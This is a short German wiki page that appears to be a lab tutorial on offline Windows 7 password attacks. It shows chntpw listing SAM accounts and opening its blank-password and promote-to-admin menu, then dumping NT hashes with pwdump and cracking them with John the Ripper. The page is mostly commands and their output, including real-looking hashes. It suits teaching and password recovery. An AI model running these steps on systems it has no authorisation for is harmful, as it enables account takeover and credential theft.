Password Hacking

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Windows 7

chntpw

list

  • chntpw -l SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf>
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes.

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 01f5 | Gast                           |        | dis/lock |
| 03e9 | Jan                            | ADMIN  |          |
| 03ee | thomas                         | ADMIN  |          |
| 03ec | xinux                          | ADMIN  |          |

edit

  • chntpw -u xinux SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf>
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes.

================= USER EDIT ====================

RID     : 1004 [03ec]
Username: xinux
fullname: xinux
comment : 
homedir : 

00000220 = Administratoren (which has 4 members)
000003ed = HomeUsers (which has 2 members)

Account bits: 0x0010 =
[ ] Disabled        | [ ] Homedir req.    | [ ] Passwd not req. | 
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     | 
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   | 
[ ] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  | 
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  | 

Failed login count: 0, while max tries is: 0
Total  login count: 14

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select

john the ripper

  • cd /mnt/Windows(System32/config
  • cp SAM SYSTEM /root
  • cd /root
  • pwdump SYSTEM SAM > hash.txt
  • root@kali:~# cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:94aa68f72ab39cfec7ffcb58dca3358c:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jan:1001:aad3b435b51404eeaad3b435b51404ee:18af5f2d758336eade8dd06361c6acc2:::
xinux:1004:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6:::
thomas:1006:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6::
  • john hash.txt -format=nt2 -users=xinux
Abgerufen von „http://wiki.ixheim.de/index.php?title=Password_Hacking&oldid=7500